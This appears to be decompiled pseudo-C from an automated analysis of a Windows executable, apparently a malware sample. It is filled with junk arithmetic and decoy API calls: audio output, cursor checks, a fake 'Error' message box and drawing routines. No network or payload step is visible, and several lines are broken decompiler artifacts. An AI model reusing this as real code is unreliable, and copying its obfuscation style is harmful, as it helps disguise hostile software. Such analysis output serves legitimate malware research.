				void* _t810;
				void* _t811;
				void* _t812;
				void* _t814;

				_t741 = _t740 - 0x2bc;
				 *0x44cb5c =  *0x44cb5c + 5;
				_t728 = CreateEventA(0, 0, 0, 0);
				_v676 = _t728;
				_t277 = GetProcessHeap();
				_t681 =  *0x44d36c; // 0x0
				_t556 = 0;
				_v684 = _t277;
				_t278 =  *0x44ca4c; // 0x0
				 *0x44cb5c =  *0x44cb5c + _t278 +  *0x44b630;
				_v696 = 0;
				_v652.x = 0;
				_v652.y = 0;
				_v644.x = 0;
				_v644.y = 0;
				_v668 = CreateEventA(0, 0, 0, "grot");
				GetCursorPos( &_v652);
				_t10 =  &(_t556->i); // 0x1
				_t651 = _t10;
				_t683 = _t681 *  *0x44d364 + 0xa;
				if(_t683 != 0) {
					while(1) {
						asm("xorps xmm0, xmm0");
						_v628.cbSize = 0;
						asm("movups [esp+0x58], xmm0");
						_v628.wBitsPerSample = 8;
						_t726 = 0;
						_v628.wFormatTag = _t651;
						_t683 = _t683 - 1;
						_v700 = 0;
						_t739 = 0;
						_v628.nSamplesPerSec = 0x1f40;
						GetCursorPos( &_v644);
						_v628.nChannels = 1;
						_t517 = _v628.wBitsPerSample >> 3;
						_v628.nBlockAlign = _t517;
						_v628.nAvgBytesPerSec = (_t517 & 0x0000ffff) * _v628.nSamplesPerSec;
						if(_v652.x != _v644.x || _v652.y != _v644.y) {
							_t739 = CreateFileW(L"wav", 0x80000000, 1, 0, 3, 0x80, 0);
							_t522 = HeapAlloc(_v684, 0, 0);
							_t556 =  &(_t556->i);
							__eflags = _t556;
							_v652.x = _v644.x;
							_v652.y = _v644.y;
							ReadFile(_t739, _t522, 0,  &_v700, 0);
						} else {
							_t543 =  *0x44cdb4; // 0x0
							_t645 =  *0x44c830; // 0x0
							 *0x44cb5c = 2;
							asm("cdq");
							_t551 =  *0x44d1ec; // 0x9119dde3
							 *0x44d1ec = _t551 + 0x1fb + (((_t543 << 4) -  *0x44cdb4 +  *0x44cb5c) *  *0x44b630 - _t651 >> 1) +  *0x44b630 + (_t645 + _t645 * 4) * 2 +  *0x44d364;
							_t726 = GetFileSize(0, 0);
						}
						_t524 =  *0x44d370; // 0x770
						 *0x44d364 = _t524 -  *0x44c834 +  *0x44cdb4 +  *0x44ca4c;
						waveOutOpen( &_v692, 0xffffffff,  &_v628, _v676, 0, 0x50000);
						if(_t556 == 0) {
							goto L10;
						}
						_t679 =  *0x44d1ec; // 0x9119dde3
						_t535 =  *0x44cdb4; // 0x0
						_t536 =  *0x44b630; // 0xd65634aa
						 *0x44b630 = _t536 + 3 + _t535 + _t679 * 2 + _t679;
						waveOutMessage(_v720.y, _t679, 2, 0);
						_t531 =  &(_v736.hdc->i);
						_v736.hdc = _t531;
						if( *0x44cdb4 == 0) {
							L11:
							_t641 = _v736.fRestore;
						} else {
							_t641 = HeapAlloc(_v724, 8, 0x20);
							_t531 = _v736.hdc;
							_v736.rcPaint = _t641;
						}
						if(_t556 <= 1) {
							if( *0x44cdb4 != 0) {
								 *((intOrPtr*)(_t641 + 4)) = _t726;
							}
							if(_t531 == 5) {
								_t532 =  *0x44cb5c; // 0x2
								_t51 = _t532 + 1; // 0x3
								_t644 = _t51 * _t532 +  *0x44c830;
								__eflags = _t644;
								 *0x44cb5c = _t644;
							} else {
								WaitForSingleObject(_v692, 0xbb6);
								CloseHandle(_t739);
								if(_t683 != 0) {
									_t651 = 1;
									continue;
								} else {
								}
							}
						}
						_t728 = _v700;
						goto L20;
						L10:
						_t531 = _v720.x;
						goto L11;
					}
				}
				L20:
				waveOutPrepareHeader(_v692, 0, 0x20);
				if( *0x44d374 != 0) {
					waveOutWrite(_v736.rgbReserved.hdc, 0, 0x20);
				}
				_t284 =  *0x44ca44; // 0x76d
				 *0x44d364 = _t284 +  *0x44c830;
				_t286 =  *0x44cdb4; // 0x0
				_t758 = _t286;
				if(_t286 != 0) {
					WaitForSingleObject(_t728, _t286);
				}
				waveOutClose(_v736.rgbReserved.hdc);
				_t701 =  *0x44ca54; // 0x1e0000
				_t702 = _t701 *  *0x44cdb4;
				asm("xorps xmm0, xmm0");
				asm("movq [esp+0x34], xmm0");
				asm("movq [esp+0x4c], xmm0");
				_t654 = (0x88888889 *  *0x44c834 >> 0x20) +  *0x44c834 >> 4;
				_v652.y = 0;
				_t576 = _t654 + (_t654 >> 0x1f) - _t702 - (_v12 & 0x000000ff) + ( *0x44c830 & 0x0000ffff) -  *0x44d378 -  *0x44d364;
				 *0x44cb5c = _t654 + (_t654 >> 0x1f) - _t702 - (_v12 & 0x000000ff) + ( *0x44c830 & 0x0000ffff) -  *0x44d378 -  *0x44d364;
				IsDlgButtonChecked( *0x44ca4c,  *0x44d1ec);
				_t293 =  *0x44ca54; // 0x1e0000
				 *0x44cdac = _t293;
				SetWindowTextA(GetDlgItem(0,  *0x44d364),  &_v684);
				_v628.nSamplesPerSec = 0;
				_v628.nAvgBytesPerSec = 0;
				_v628.nBlockAlign = 0;
				_v628.cbSize = 0;
				_v608.hdc = 0;
				_t297 = E0041500C(_t654, _t758, 8);
				_t742 = _t741 + 4;
				if(_t297 == 0) {
					E0041A825(_t556, _t576, _t654, __eflags);
					goto L112;
				} else {
					_v628.nSamplesPerSec = _t297;
					 *_t297 = 0;
					_t297[1] = 0;
					 *(_v628.nSamplesPerSec) =  &(_v628.nSamplesPerSec);
					E004132E0(_t556,  &(_v628.nSamplesPerSec), _t654, _t728, 0x44d364);
					_t662 =  *0x44ca48; // 0x0
					_t760 = 0x39 -  *0x44d378; // 0x1770020
					if(_t760 == 0) {
						 *0x44cb5c = 0 -  *0x44cdb4 + _t662 +  *0x44d1ec;
					}
					_t596 =  *0x44ca40; // 0x770
					_t379 =  *0x44c834; // 0x2
					_v720.y = 0;
					_t732 = _t379 + _t596 * 2 + _t596;
					_t654 =  >=  ?  *0x44ca4c : _t662;
					_v668 = _t732;
					 *0x44ca48 =  >=  ?  *0x44ca4c : _t662;
					E004132E0(_t556,  &(_v628.nSamplesPerSec),  >=  ?  *0x44ca4c : _t662, _t732,  &(_v720.y));
					_t556 = 0;
					_t683 = 0;
					_t702 = 0;
					_v736.rgbReserved.hdc = 0;
					_t576 = 0;
					_v688 = 0;
					_v684 = 0;
					_v736.fRestore = 0;
					_v680 = 0;
					_v696 = 0;
					if(_t732 <= 0) {
						L44:
						_t710 = 5;
						_t688 = 0;
						do {
							KillTimer( *0x44d374, 2);
							if(_v652.x != 0) {
								_t383 =  *0x44cdb4; // 0x0
								_t384 = _t383 *  *0x44d364;
								__eflags = _t384;
								 *0x44cb5c = _t384;
							} else {
								_t598 =  *0x44cdb4; // 0x0
								_t484 =  *0x44cb5c; // 0x2
								asm("cdq");
								_t576 = _t598 + 0x62;
								_t688 = _t688 + _t484 / (_t598 + 0x62) *  *0x44d364 -  *0x44d1ec;
							}
							_t710 = _t710 - 1;
						} while (_t710 != 0);
						_t689 = _v736.fIncUpdate;
						_t664 = 0;
						if(_t732 > 0) {
							do {
								_t483 =  *0x44cdac; // 0x0
								_t576 =  *((intOrPtr*)(_t556 + _t664));
								 *((char*)(_t664 + _t483)) =  *((intOrPtr*)(_t556 + _t664));
								_t664 = _t664 + 1;
							} while (_t664 < _t732);
						}
						_t385 =  *0x44c834; // 0x2
						_t728 = 0;
						_t654 =  *0x44cdac; // 0x0
						_v720.y = _t385 + 0x54;
						_t387 = 0;
						_v736.rgbReserved.hdc = _t654;
						_v736.fRestore = 0;
						if(_v668 > 0) {
							_t610 =  *0x44d36c; // 0x0
							_t567 = 0;
							_t696 = _v720.y;
							do {
								_v693 =  *((intOrPtr*)(_t654 + _t387));
								_t567 = _t567 + 0x35 + _t728 - _t610;
								if(_t610 != 0) {
									_t631 = 0;
									_t676 = ( *( *((intOrPtr*)(_t610 + 0x3c)) + _t610 + 6) & 0x0000ffff) - 1;
									if(_t676 > 0) {
										do {
											_t631 = _t631 + 1;
										} while ((_t631 & 0x0000ffff) < _t676);
									}
									MessageBoxA(GetActiveWindow(), "Application", "Error", 0x10);
								}
								_t460 = _t567 * _t696;
								_t702 = _t567 - _t728;
								_v692 = _t728 * 0xffffffd3 - _t460 - _t696 + _t702 + _t567;
								__imp__MonitorFromWindow( *0x44d374, 0);
								 *0x44d37c = _t460;
								_t618 =  !=  ? (_v700 ^ _v701) & 0x000000ff : _v736.fRestore & 0x000000ff;
								 *((char*)(_v720.x + _v736.fRestore)) =  !=  ? (_v700 ^ _v701) & 0x000000ff : _v736.fRestore & 0x000000ff;
								_t576 =  *0x44d36c; // 0x0
								_v668 = (_t567 + _t696) * _v700 * _t702;
								_t784 =  *0x44d370 - _t576; // 0x770
								if(_t784 > 0) {
									if(_t696 > 0) {
										_t702 = _v700;
										_v692 = 0;
										_v724 = _t696;
										do {
											asm("cdq");
											_t471 =  &_v652;
											_t567 = _t567 * (_t728 * _t696 * 0x17 - 0x4a /  &(_t576->i) - _v668 + _t702);
											__imp__MonitorFromRect(_t471, 2);
											_v608.hdc = 0x28;
											GetMonitorInfoA(_t471,  &_v608);
											asm("cdq");
											_t629 = _v700;
											_v700 = _t629 + _t696;
											_t576 =  *0x44d36c; // 0x0
											_t728 = _t728 * 0xffffffda - 0x20 - (_t702 * _t567 + _t629) * _v676;
											_t150 =  &(_v736.fErase);
											 *_t150 = _v736.fErase - 1;
										} while ( *_t150 != 0);
									}
									goto L62;
								}
								break;
								L62:
								_t654 = _v736.fRestore;
								_t387 = _v720.x + 1;
								_v720.x = _t387;
							} while (_t387 < _v676);
							_t654 =  *0x44cdac; // 0x0
							_t556 = _v736.fIncUpdate;
							_t689 = _v720.y;
						}
						_t654->i =  &_v12;
						if(_t556 == 0) {
							L72:
							E00413130(_t556,  &(_v628.nSamplesPerSec), _t654, _t728);
							L0041503F(_v628.nSamplesPerSec);
							_t391 =  *0x44d1ec; // 0x9119dde3
							_t746 = _t742 + 4;
							_t711 =  *0x44cdb0; // 0x0
							_t690 =  *0x44cdb4; // 0x0
							_t712 = _t711 + 1;
							_v684 = _t391;
							_t392 =  *0x44d364; // 0x76e
							_v720.y = _t392;
							_t393 =  &(_v736.fRestore);
							__imp__CoCreateInstance(0x437d90, 0, 0x17, 0x437d80, _t393);
							if(_t393 >= 0) {
								_t565 = GetCurrentObject(_t712, 6);
								_v684 = _t565;
								_t429 = GetTextAlign(_t712);
								_v736.hdc = _t429;
								_t604 = _t429 & 0x00000001;
								_v696 = _t604;
								if(_t604 == 0) {
									SetTextAlign(_t712, _t429 | 0x00000001);
								}
								MoveToEx(_t712, _v736.fRestore, _v744,  &_v720);
								_t432 = _v756.x;
								_push( &_v744);
								_push(_t565);
								_v744 = 0;
								_push(_t712);
								_push(_t432);
								if( *((intOrPtr*)( *_t432 + 0x1c))() >= 0 && _t690 > 0) {
									while(1) {
										_t438 = _v772;
										_push( &_v764);
										_push( &_v744);
										_push(_v760);
										_push(_t690);
										_push( &_v588);
										_push(_t438);
										if( *((intOrPtr*)( *_t438 + 0x10))() < 0) {
											break;
										}
										_t671 = _v768;
										if((_v784 & _t671) == 0) {
											_t442 = _v796;
											_t443 =  *((intOrPtr*)( *_t442 + 0x28))(_t442, _t712, _t671, 0,  &_v800);
											__eflags = _t443;
											if(_t443 < 0) {
												break;
											} else {
												SelectObject(_t712, _v820);
												TextOutW(_t712, 0, 0,  &(_v644.y), _v816);
												SelectObject(_t712, _v792);
												_t448 = _v852;
												 *((intOrPtr*)( *_t448 + 0x20))(_t448, _v856);
												goto L83;
											}
										} else {
											TextOutW(_t712, 0, 0,  &(_v628.cbSize), _v788);
											L83:
											_t690 = _t690 - _v852;
											if(_t690 > 0) {
												continue;
											} else {
											}
										}
										goto L86;
									}
									TextOutW(_t712, 0, 0,  &(_v628.cbSize), _t690);
								}
								L86:
								_t434 = _v772;
								 *((intOrPtr*)( *_t434 + 8))(_t434);
								_t802 = _v736.fErase;
								if(_t802 == 0) {
									SetTextAlign(_t712, _v772);
									MoveToEx(_t712, _v764, _v760, 0);
								}
							}
							_t561 =  *0x44d374; // 0x0
							_t691 = BeginPaint(_t561,  &_v608);
							_t396 = CreatePen(0, 1, 0);
							_v744 = _t396;
							SelectObject(_t691, _t396);
							MoveToEx(_t691, 0x32, 0x82, 0);
							LineTo(_t691, 0xfa, 0x82);
							MoveToEx(_t691, 0x96, 0xe6, 0);
							_t401 = LineTo(_t691, 0x96, 0x1e);
							asm("movsd xmm0, [0x437d58]");
							asm("movsd [esp+0x30], xmm0");
							do {
								asm("addsd xmm0, [0x437d50]");
								asm("cvttsd2si eax, xmm0");
								_t401 = SetPixel(_t691, _t401, 0x82, 0);
								asm("movsd xmm0, [esp+0x30]");
								asm("addsd xmm0, [0x437d28]");
								asm("movsd xmm1, [0x437d48]");
								asm("comisd xmm1, xmm0");
								asm("movsd [esp+0x30], xmm0");
							} while (_t802 > 0);
							DeleteObject(_v824);
							EndPaint(_t561,  &(_v736.rgbReserved));
							_t692 =  *0x44d374; // 0x0
							_t715 = BeginPaint(_t692,  &(_v736.rgbReserved));
							SelectObject(_t715, CreatePen(0, 3, 0xff0000));
							asm("movaps xmm0, [0x437d70]");
							asm("movups [esp+0x70], xmm0");
							asm("movaps xmm0, [0x437d60]");
							asm("movups [esp+0x88], xmm0");
							Polyline(_t715,  &_v756, 4);
							EndPaint(_t692,  &_v736);
							_t413 =  *0x44cdb0; // 0x0
							_push( &_v860);
							_push(0);
							_t716 =  *0x44d1ec; // 0x9119dde3
							_t693 =  *0x44d364; // 0x76e
							_t414 = _t413 + 1;
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x7fffffff);
							_push(0xa0);
							_push(0xffffffff);
							_push(0);
							_push( *0x44cdb4);
							_push( &_v672);
							_push(_t414);
							L0041645A();
							if(_t414 >= 0) {
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(0);
								_push(_t693);
								_push(_t716);
								_push(_v912);
								L00416466();
								_push( &_v944);
								L00416460();
							}
							_t415 =  *0x44cdac; // 0x0
							_v876 = _t415;
							_t416 =  *0x44b630; // 0xd65634aa
							_v880 = E00412D70;
							_v872 = _t416;
							_t417 = LoadMenuA(_v208, 0x44cb60);
							_t717 =  *0x44ca4c; // 0x0
							_t563 = _t417;
							_t418 =  *0x44d370; // 0x770
							_t665 = 0;
							_t602 =  *0x44b630; // 0xd65634aa
							if(_t418 > 0) {
								while(1) {
									_t602 = _t602 + _t665;
									 *0x44b630 = _t602;
									if(_t602 > _t418 && _t717 != 0) {
										goto L97;
									}
									_t665 = _t665 + 1;
									if(_t665 < _t418) {
										continue;
									}
									goto L97;
								}
							}
							L97:
							_t694 =  *0x44cdb4; // 0x0
							if(_t694 == 0) {
								__eflags = _t563;
								if(_t563 != 0) {
									_t419 = 2;
								} else {
									asm("cdq");
									_t419 = _t418 + (_t665 & 0x000001ff) >> 9;
								}
								_t420 = _t419 - 2;
								__eflags = _t420;
							} else {
								_t420 = 0;
							}
							if(_t717 != 0) {
								L107:
								 *_t694 = _t602;
							} else {
								_t810 =  *0x44ca40 - _t717; // 0x770
								if(_t810 == 0) {
									goto L107;
								} else {
									_t811 =  *0x44d378 - _t717; // 0x1770020
									if(_t811 == 0) {
										goto L107;
									} else {
										EnumFontsA(GetDC(_t717), _t717,  *(_t746 + 0x34 + _t420 * 4), _t717);
									}
								}
							}
							_t421 =  *0x44cdb4; // 0x0
							_t812 = _t421 -  *0x44d370; // 0x770
							if(_t812 < 0) {
								 *0x44d378 =  *((intOrPtr*)(0x44d1f0 + _t421 * 4));
							}
							return 0;
						} else {
							_t683 = _t689 - _t556;
							if(_t683 < 0x1000) {
								L71:
								L0041503F(_t556);
								_t742 = _t742 + 4;
								goto L72;
							} else {
								if((_t556 & 0x0000001f) != 0) {
									goto L113;
								} else {
									_t455 =  *(_t556 - 4);
									if(_t455 >= _t556) {
										goto L114;
									} else {
										_t556 = _t556 - _t455;
										if(_t556 < 4) {
											goto L115;
										} else {
											if(_t556 > 0x23) {
												goto L116;
											} else {
												_t556 = _t455;
												goto L71;
											}
										}
									}
								}
							}
						}
					} else {
						do {
							_t84 = _t576 + 0x44a008; // 0x44a008
							_t728 = _t84;
							if(_t728 >= _t702 || _t556 > _t728) {
								__eflags = _t702 - _t683;
								if(_t702 != _t683) {
									L40:
									__eflags = _t702;
									if(__eflags != 0) {
										_t490 =  *_t728;
										goto L42;
									}
									goto L43;
								} else {
									__eflags = _t683 - _t702 - 1;
									if(_t683 - _t702 >= 1) {
										goto L40;
									} else {
										__eflags = _t556 - _t702 - 1 - 1;
										if(__eflags < 0) {
											goto L112;
										} else {
											_t698 = _t683 - _t556;
											_t721 = _t702 - _t556 + 1;
											_t504 = _t698 >> 1;
											__eflags =  !_t504 - _t698;
											_t654 =  >=  ? _t504 + _t698 : 0;
											__eflags = _t654 - _t721;
											_t722 =  >=  ? _t654 : _t721;
											E00413000( &_v684, _t654,  >=  ? _t654 : _t721);
											_t683 = _v680;
											_t556 = _v688;
											_t702 = _v684;
											_t576 = _v696;
											_v736.fRestore = _t683;
											_v736.rgbReserved.hdc = _t556;
											goto L40;
										}
									}
								}
							} else {
								_t728 = _t728 - _t556;
								if(_t702 != _t683 || _t683 - _t702 >= 1) {
									L34:
									if(_t702 != 0) {
										_t490 =  *((intOrPtr*)(_t556 + _t728));
										L42:
										 *_t702 = _t490;
									}
									goto L43;
								} else {
									if(_t556 - _t702 - 1 < 1) {
										L112:
										_push("vector<T> too long");
										E004136FB(_t556, _t683, __eflags);
										L113:
										E0041A825(_t556, _t576, _t654, __eflags);
										L114:
										E0041A825(_t556, _t576, _t654, __eflags);
										L115:
										E0041A825(_t556, _t576, _t654, __eflags);
										L116:
										E0041A825(_t556, _t576, _t654, __eflags);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t743 = _t742 - 0x16c;
										__eflags =  *0x44d364;
										if( *0x44d364 != 0) {
											_t372 =  *0x44b630; // 0xd65634aa
											_t373 = _t372 -  *0x44cb5c;
											__eflags = _t373;
											 *0x44cb5c = _t373;
										}
										_push(_t702);
										_v1096 = 0;
										_push( &_v1100);
										_t305 =  &_v1096;
										_v1100 = 0;
										_push(_t305);
										_push(0);
										_push(0);
										_push(0); // executed
										L00416454(); // executed
										_t703 = _t305;
										__eflags = _t703;
										if(_t703 == 0) {
											_t704 =  *0x44ca40; // 0x770
											_t703 = _t704 + 0x25b;
											__eflags = _t703;
										} else {
											 *0x44cdb4 = 0;
										}
										__eflags = _v756.y;
										if(_v756.y == 0) {
											__eflags =  *0x44d368;
											if(__eflags == 0) {
												_push(0xa47);
												E0041FCE9(_t556, _t654, _t683, _t703, __eflags, _t814, L"_hinst != NULL", L"build.cpp");
												_t743 = _t743 + 0xc;
											}
										}
										 *0x44d1ec =  *0x44d1ec + 1;
										_t306 =  *0x44cb5c; // 0x2
										_t577 =  *0x44ca4c; // 0x0
										__eflags =  *0x44cdb4 - _t306; // 0x0
										if(__eflags <= 0) {
											_t307 = _t306 + 0x13a;
											__eflags = _t307;
											 *0x44cb5c = _t307;
										} else {
											_t368 =  *0x44b630; // 0xd65634aa
											 *0x44cdb4 = 0;
											 *0x44b630 = _t368 + 0x1d4 + _t577;
										}
										_push(_t556);
										 *0x44d364 =  *0x44d364 + 0xfffffffe - _t577;
										_t310 =  *0x44ca44; // 0x76d
										_push(_t728);
										_push(_t683);
										_push(0x2400);
										_push(0x1f40);
										 *0x44ca44 = _t310 + 0x512 + _t703; // executed
										_t313 = E0041A956();
										_t729 =  *0x44ca4c; // 0x0
										_t744 = _t743 + 8;
										_t684 = _t313;
										_v1120 = _t684;
										 *0x44ca40 = GetLastError();
										_t315 = PathFindFileNameA(0x44cb60);
										_t705 =  *0x44b630; // 0xd65634aa
										_v1104 = _t315;
										_t316 =  *0x44cb5c; // 0x2
										_v1116 = _t316;
										_t317 = GetDlgItem( *0x44ca4c, _t705);
										_t655 =  *0x44ca40; // 0x770
										_t557 = _t317;
										_t578 =  *0x44b630; // 0xd65634aa
										_v1052 =  &_v1012;
										_t319 =  *0x44d1ec; // 0x9119dde3
										_v1108 = _t557;
										_v1072 = 1;
										_v1048 = 0x100;
										_v1064 = 1;
										 *0x44b630 = _t578 + _t655 + 0x32 + (_t655 + 0x32) * 2;
										_t581 =  *0x44cdb4; // 0x0
										_t584 = _t581 -  *0x44ca4c + 0x22 + _t684;
										_v1112 = _t584;
										__eflags = _t319 + _t584;
										if(_t319 + _t584 != 0) {
											 *0x44cb5c =  *0x44cb5c + 1;
											__eflags =  *0x44cb5c;
										}
										SendMessageA(_t557, 0x102d, _t705,  &_v1072);
										_t323 =  *0x44d364; // 0x76e
										 *0x44cb5c = (_v756.y -  *0x44b630 - 1) * (_t323 +  *0x44b630);
										StrToIntExA( &_v1012, 1,  &_v1100);
										_t328 =  *0x44cdb4; // 0x0
										 *0x44d364 = (_t328 + 1) *  *0x44b630 * 0x96 +  *0x44d1ec;
										_t333 =  *0x44cb5c; // 0x2
										 *0x44b630 = _t333 + _t333 * 2 + _t333 + _t333 * 2;
										_t336 =  *0x44ca44; // 0x76d
										 *0x44ca40 =  *0x44ca40 + _t336;
										 *0x44cdc4 = CreatePen(0, 1, GetSysColor(0x16));
										SendMessageA(_v1128, 0x102d, _v1136,  &_v1092);
										_t341 =  *0x44c834; // 0x2
										_v1132 = _v1132 + _t729 + (_t341 + 0x32 + _t684) * 2 + _t341 + 0x32 + _t684;
										StrToIntExA( &_v1032, 1,  &_v1116);
										_t707 = 0;
										__eflags = 0;
										do {
											_t261 = _t707 + 1; // 0x1
											_t559 = _t261;
											wnsprintfA( &_v1120, 0x14, "%Xh (%u, LPT%u)",  *(0x437cb0 + _t707 * 2) & 0x0000ffff,  *(0x437cb0 + _t707 * 2) & 0x0000ffff, _t559);
											_t685 =  *0x44c830; // 0x0
											_t744 = _t744 + 0x18;
											_t661 =  *0x44cdb4; // 0x0
											_t686 = _t685 *  *0x44d1ec;
											_t264 = _t661 + 2; // 0x2
											 *0x44d364 = _t264 + _t264 * 2 + _t685 * _v1144 +  *0x44b630;
											 *0x44d378 = _v1144;
											 *0x44d370 = _t707 * _t661 +  *0x44ca40;
											SendMessageA(_t729, 0x143, 0,  &_v1116);
											__eflags = _v1144 -  *(0x437cb0 + _t707 * 2);
											if(_v1144 ==  *(0x437cb0 + _t707 * 2)) {
												_t591 =  *0x44d1ec; // 0x9119dde3
												_t363 =  *0x44cdb4; // 0x0
												_t365 = 1 + _t363 * 2 + (_t591 -  *0x44cb5c) * _t686 + _v1136;
												__eflags = _t365;
												 *0x44d364 = _t365;
												SendMessageA(_t729, 0x14e, _t707, 0);
												_t367 =  *0x44c830; // 0x0
												 *0x44d1ec = _t367;
											}
											_t707 = _t559;
											__eflags = _t707 - 3;
										} while (_t707 < 3);
										_t708 = _v1128;
										_t360 = StrChrA(_t708, 0x20);
										__eflags = _t360;
										if(_t360 == 0) {
											PathFindExtensionA(_t708);
										}
										__eflags = 0;
										return 0;
									} else {
										_t697 = _t683 - _t556;
										_t654 =  >=  ? (_t697 >> 1) + _t697 : 0;
										_t725 =  >=  ?  >=  ? (_t697 >> 1) + _t697 : 0 : _t702 - _t556 + 1;
										E00413000( &_v684,  >=  ? (_t697 >> 1) + _t697 : 0,  >=  ?  >=  ? (_t697 >> 1) + _t697 : 0 : _t702 - _t556 + 1);
										_t683 = _v680;
										_t556 = _v688;
										_t702 = _v684;
										_t576 = _v696;
										_v736.fRestore = _t683;
										_v736.rgbReserved = _t556;
										goto L34;
									}
								}
							}
							goto L137;
							L43:
							_t732 = _v668;
							_t576 =  &(_t576->i);
							_t702 = _t702 + 1;
							_v692 = _t576;
							_v680 = _t702;
						} while (_t576 < _t732);
						goto L44;
					}
				}
				L137:
			}

0x00411dd0
0x00411dd6
0x00411df1
0x00411df3
0x00411df7
0x00411dfd
0x00411e03
0x00411e11
0x00411e15
0x00411e20
0x00411e29
0x00411e2d
0x00411e31
0x00411e35
0x00411e39
0x00411e3f
0x00411e48
0x00411e4e
0x00411e4e
0x00411e51
0x00411e54
0x00411e65
0x00411e65
0x00411e68
0x00411e6f
0x00411e78
0x00411e80
0x00411e82
0x00411e88
0x00411e89
0x00411e8d
0x00411e8f
0x00411e97
0x00411ea2
0x00411eac
0x00411eb0
0x00411ebd
0x00411ec9
0x00411f59
0x00411f5b
0x00411f65
0x00411f65
0x00411f66
0x00411f70
0x00411f7d
0x00411ed5
0x00411ed5
0x00411eda
0x00411efb
0x00411f05
0x00411f13
0x00411f25
0x00411f30
0x00411f30
0x00411f83
0x00411fa5
0x00411fb6
0x00411fbe
0x00000000
0x00000000
0x00411fc0
0x00411fc6
0x00411fd7
0x00411fe3
0x00411fe8
0x00411ff2
0x00411ffa
0x00411ffe
0x0041201e
0x0041201e
0x00412000
0x0041200e
0x00412010
0x00412014
0x00412014
0x00412025
0x0041202e
0x00412030
0x00412030
0x00412036
0x00412058
0x0041205d
0x00412063
0x00412063
0x00412069
0x00412038
0x00412041
0x00412048
0x00412050
0x00411e60
0x00000000
0x00000000
0x00412056
0x00412050
0x00412036
0x0041206f
0x00000000
0x0041201a
0x0041201a
0x00000000
0x0041201a
0x00411e65
0x00412073
0x0041207b
0x00412088
0x00412092
0x00412092
0x00412098
0x004120a3
0x004120a8
0x004120ad
0x004120af
0x004120b3
0x004120b3
0x004120bd
0x004120c3
0x004120d4
0x004120db
0x004120de
0x004120e4
0x004120fe
0x00412109
0x00412129
0x0041212f
0x00412135
0x0041213b
0x00412140
0x00412159
0x00412161
0x00412169
0x00412171
0x00412179
0x00412181
0x0041218c
0x00412191
0x00412196
0x004129bf
0x00000000
0x0041219c
0x0041219c
0x004121a4
0x004121aa
0x004121ba
0x004121bc
0x004121c1
0x004121d0
0x004121d6
0x004121e8
0x004121e8
0x004121ed
0x004121f3
0x004121f8
0x00412203
0x00412215
0x0041221c
0x00412220
0x00412226
0x0041222b
0x0041222d
0x0041222f
0x00412231
0x00412235
0x00412237
0x0041223b
0x0041223f
0x00412243
0x00412247
0x0041224d
0x0041233b
0x0041233b
0x00412340
0x00412342
0x0041234a
0x00412355
0x00412379
0x0041237e
0x0041237e
0x00412385
0x00412357
0x00412357
0x0041235d
0x00412362
0x00412363
0x00412375
0x00412375
0x0041238a
0x0041238a
0x0041238f
0x00412393
0x00412397
0x004123a0
0x004123a0
0x004123a5
0x004123a8
0x004123ab
0x004123ac
0x004123a0
0x004123b0
0x004123b5
0x004123b7
0x004123c0
0x004123c4
0x004123c6
0x004123ca
0x004123d2
0x004123d8
0x004123de
0x004123e0
0x004123e4
0x004123ea
0x004123f2
0x004123f6
0x00412400
0x00412402
0x00412405
0x00412407
0x00412407
0x0041240b
0x00412407
0x00412422
0x00412422
0x0041242d
0x00412432
0x00412444
0x00412448
0x00412456
0x0041246b
0x00412472
0x0041247d
0x00412486
0x0041248a
0x00412490
0x00412498
0x0041249e
0x004124a2
0x004124aa
0x004124b0
0x004124b6
0x004124c5
0x004124d0
0x004124d3
0x004124e0
0x004124ed
0x00412506
0x00412509
0x0041251d
0x00412521
0x00412527
0x00412529
0x00412529
0x00412529
0x004124b0
0x00000000
0x00412498
0x00000000
0x00412530
0x00412534
0x00412538
0x00412539
0x0041253d
0x00412547
0x0041254d
0x00412551
0x00412551
0x0041255c
0x00412561
0x004125a0
0x004125a4
0x004125ad
0x004125b2
0x004125b7
0x004125ba
0x004125c0
0x004125c6
0x004125c7
0x004125cb
0x004125d0
0x004125d4
0x004125e7
0x004125f5
0x00412604
0x00412607
0x0041260b
0x00412613
0x00412617
0x0041261a
0x0041261e
0x00412625
0x00412625
0x00412639
0x0041263f
0x00412647
0x00412648
0x00412649
0x00412653
0x00412654
0x0041265a
0x00412670
0x00412670
0x00412678
0x0041267d
0x0041267e
0x0041268b
0x0041268c
0x0041268d
0x00412693
0x00000000
0x00000000
0x00412699
0x004126a1
0x004126b8
0x004126c8
0x004126d1
0x004126d3
0x00000000
0x004126d5
0x004126da
0x004126ed
0x004126f4
0x004126f6
0x00412701
0x00000000
0x00412701
0x004126a3
0x004126b4
0x00412704
0x00412704
0x0041270a
0x00000000
0x00000000
0x00412710
0x0041270a
0x00000000
0x004126a1
0x00412720
0x00412720
0x00412722
0x00412722
0x00412729
0x0041272c
0x00412731
0x00412738
0x00412749
0x00412749
0x00412731
0x0041274f
0x0041276a
0x0041276c
0x00412774
0x00412778
0x00412784
0x0041279b
0x004127aa
0x004127b8
0x004127ba
0x004127c8
0x004127d0
0x004127d0
0x004127df
0x004127e5
0x004127e7
0x004127ed
0x004127f5
0x004127fd
0x00412801
0x00412801
0x0041280d
0x00412822
0x00412824
0x00412842
0x0041284c
0x0041284e
0x0041285b
0x00412861
0x00412869
0x00412871
0x00412880
0x00412882
0x0041288b
0x0041288c
0x0041288e
0x0041289b
0x004128a1
0x004128a2
0x004128a4
0x004128a6
0x004128a8
0x004128aa
0x004128af
0x004128b4
0x004128b6
0x004128b8
0x004128be
0x004128bf
0x004128c0
0x004128c7
0x004128c9
0x004128cb
0x004128cd
0x004128cf
0x004128d1
0x004128d3
0x004128d4
0x004128d5
0x004128d9
0x004128e2
0x004128e3
0x004128e3
0x004128e8
0x004128f9
0x004128fd
0x00412902
0x0041290a
0x0041290e
0x00412914
0x0041291a
0x0041291c
0x00412921
0x00412923
0x0041292b
0x00412930
0x00412930
0x00412932
0x0041293a
0x00000000
0x00000000
0x00412940
0x00412943
0x00000000
0x00000000
0x00000000
0x00412943
0x00412930
0x00412945
0x00412945
0x0041294d
0x00412953
0x00412955
0x00412965
0x00412957
0x00412957
0x00412960
0x00412960
0x0041296a
0x0041296a
